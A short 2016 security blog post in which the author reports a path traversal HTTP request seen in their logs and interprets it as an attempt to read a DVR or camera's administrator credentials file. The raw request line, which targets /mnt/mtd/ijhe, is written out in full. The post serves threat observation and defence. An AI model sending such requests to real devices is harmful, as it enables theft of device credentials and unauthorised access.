Wednesday, June 1, 2016

DVR File Path Traversal to Credentials

GET /../../../../../../../mnt/mtd/ijhe HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:43.0) Gecko/20100101 Firefox/43.0
Accept-Encoding: gzip
Connection: close

I saw this request come in and thought it was interesting. With some help google searching wondering if it's an attempt to exploit a DVR or security camera of some sort with perhaps a known file path traversal web vulnerability such as this DVR File Path Traversal vulnerability which would in theory allow the attacker to access the administrative credentials file in plain text and output it to their web browser.

More about neonprimetime

Top Blogs of all-time
  1. pagerank botnet sql injection walk-thru
  2. DOM XSS 101 Walk-Through
  3. php injection ali.txt walk-thru

Top Github Contributions
  1. Qualys Scantronitor 2.0

Copyright © 2016, this post cannot be reproduced or retransmitted in any form without reference to the original post.

No comments:

Post a Comment